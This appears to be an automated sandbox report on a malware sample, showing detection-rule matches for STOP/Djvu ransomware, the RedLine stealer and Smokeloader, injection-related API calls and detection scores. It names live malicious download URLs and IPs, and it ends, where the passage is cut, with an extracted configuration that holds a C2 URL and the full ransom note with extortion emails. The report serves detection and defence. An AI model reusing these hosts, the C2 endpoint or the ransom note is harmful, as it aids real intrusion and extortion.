Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000002A.00000002.617050897.0000000002320000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000001B.00000002.416891695.0000000002232000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.422729797.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001F.00000002.458356250.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 00000017.00000002.422861272.0000000000666000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.422932129.00000000020C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001B.00000002.417250083.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000002A.00000002.587743224.000000000228A000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.287959121.0000000000590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000019.00000002.413738887.0000000002337000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.395568327.0000000000700000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000B.00000002.375723572.0000000002190000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000D.00000002.382364592.0000000002258000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000B.00000002.375676925.00000000007C6000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000017.00000002.422753808.0000000000620000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000000F.00000002.395494716.0000000000616000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000000F.00000002.395645778.00000000021B1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.288034610.0000000000711000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 0000001D.00000002.453835364.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000B.00000002.375648108.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth (Nextron Systems), description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_STOP snort2_sid = 920113, author = ditekSHen, description = Detects STOP ransomware, clamav_sig = MALWARE.Win.Ransomware.STOP, snort3_sid = 920111
Source: 00000012.00000002.540094802.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: 0000000F.00000002.395590082.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000010.00000002.427822773.00000000005D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000000D.00000002.382455301.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A4A.exe PID: 1332, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: A4A.exe PID: 2208, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: ECAC.exe PID: 6092, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23
Source: Process Memory Space: DC3D.exe PID: 3344, type: MEMORYSTR	Matched rule: Windows_Ransomware_Stop_1e8d48ff reference_sample = 821b27488f296e15542b13ac162db4a354cbf4386b6cd40a550c4a71f4d628f3, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Ransomware.Stop, fingerprint = 715888e3e13aaa33f2fd73beef2c260af13e9726cb4b43d349333e3259bf64eb, id = 1e8d48ff-e0ab-478d-8268-a11f2e87ab79, last_modified = 2021-08-23

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401558
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	0_2_00401749
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401564
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401577
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401523
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401585
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040158C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_0040159A
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E1560 FreeConsole,NtDelayExecution,GetModuleFileNameW,CreateFileW,GetFileSize,RtlAllocateHeap,ReadFile,FindCloseChangeNotification,WideCharToMultiByte,WideCharToMultiByte,HeapAlloc,WideCharToMultiByte,lstrlenA,lstrlenA,lstrlenA,lstrlenA,	9_2_008E1560
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Code function: 9_2_008E12D0 LoadLibraryA,GetProcAddress,NtUnmapViewOfSection,VirtualAlloc,VirtualAlloc,memcpy,memcpy,puts,	9_2_008E12D0
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401558 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401558
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401749 NtMapViewOfSection,NtMapViewOfSection,	11_2_00401749
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401564 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401564
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401577 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401577
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401523 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401523
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_00401585 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_00401585
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_0040158C NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_0040158C
Source: C:\Users\user\AppData\Roaming\rirdbih	Code function: 11_2_0040159A NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	11_2_0040159A
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B02834 NtQuerySystemInformation,	12_2_00007DF449B02834
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B02E88 NtOpenFile,	12_2_00007DF449B02E88
Source: C:\Windows\System32\rundll32.exe	Code function: 12_2_00007DF449B02FA4 NtUnmapViewOfSection,VirtualAlloc,NtSetInformationFile,NtClose,	12_2_00007DF449B02FA4

Source: ECAC.exe.1.dr	Static PE information: Section: .data ZLIB complexity 0.9929530716268147
Source: DC3D.exe.1.dr	Static PE information: Section: .data ZLIB complexity 0.993064821733561
Source: 1128.exe.1.dr	Static PE information: Section: Fdfgtrg ZLIB complexity 0.9983088235294117
Source: A4A.exe.1.dr	Static PE information: Section: .data ZLIB complexity 0.9929530716268147
Source: C597.exe.1.dr	Static PE information: Section: .data ZLIB complexity 0.9898694225193299
Source: A4A.exe.18.dr	Static PE information: Section: .data ZLIB complexity 0.9929530716268147

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\WER\ERC\statecache.lock

Source: https://autoacores.com/systems/ChromeSetup.exe	URL Reputation: Label: malware
Source: http://23.106.124.133/totti.exe	URL Reputation: Label: malware
Source: https://xv.yxzgamen.com/logo.png	URL Reputation: Label: malware
Source: http://bihsy.com/test2/get.php	Avira URL Cloud: Label: malware
Source: http://179.43.176.6/getmod/xij5ka.ev8r	Avira URL Cloud: Label: malware
Source: http://80.85.241.98/s.exe	Avira URL Cloud: Label: malware
Source: http://uaery.top/dl/build.exe	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Temp\352F.exe	Avira: detection malicious, Label: HEUR/AGEN.1234960
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Avira: detection malicious, Label: HEUR/AGEN.1234960

Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\1128.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\170F.tmp.exe	ReversingLabs: Detection: 43%
Source: C:\Users\user\AppData\Local\Temp\1AED.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\352F.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	ReversingLabs: Detection: 76%
Source: C:\Users\user\AppData\Local\Temp\849F.exe	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Local\Temp\8EAD.exe	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\9760.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\ADEC.exe	ReversingLabs: Detection: 28%
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\DE4C.exe	ReversingLabs: Detection: 53%
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\F207.exe	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Local\Temp\FD42.exe	ReversingLabs: Detection: 46%
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	ReversingLabs: Detection: 61%
Source: C:\Users\user\AppData\Local\Temp\yuzhenzhang.exe	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Roaming\gdrdbih	ReversingLabs: Detection: 33%
Source: C:\Users\user\AppData\Roaming\rirdbih	ReversingLabs: Detection: 30%
Source: C:\Users\user\AppData\Roaming\sardbih	ReversingLabs: Detection: 30%

Source: C:\Users\user\AppData\Roaming\gdrdbih	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C597.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DE4C.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\352F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9760.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\8EAD.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ECAC.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1128.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B336.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\45128750-4e19-4c02-b365-166e0d776172\A4A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\llpb1133.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\42FE.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\sardbih	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1AED.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\170F.tmp.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\rirdbih	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\A4A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F207.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\849F.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DC3D.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\ADEC.exe	Joe Sandbox ML: detected

Source: 1.3.explorer.exe.10418890.0.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.explorer.exe.104b38a0.1.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.explorer.exe.11505090.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.3.explorer.exe.115ac8a0.3.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 9.2.1128.exe.ee907c.2.unpack	Avira: Label: TR/Patched.Gen

Source: 00000019.00000002.413944051.00000000023D0000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://uaery.top/dl/build2.exe", "http://bihsy.com/files/1/build3.exe"], "C2 url": "http://bihsy.com/test2/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-UQkYLBSiQ4\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0647JOsie", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and 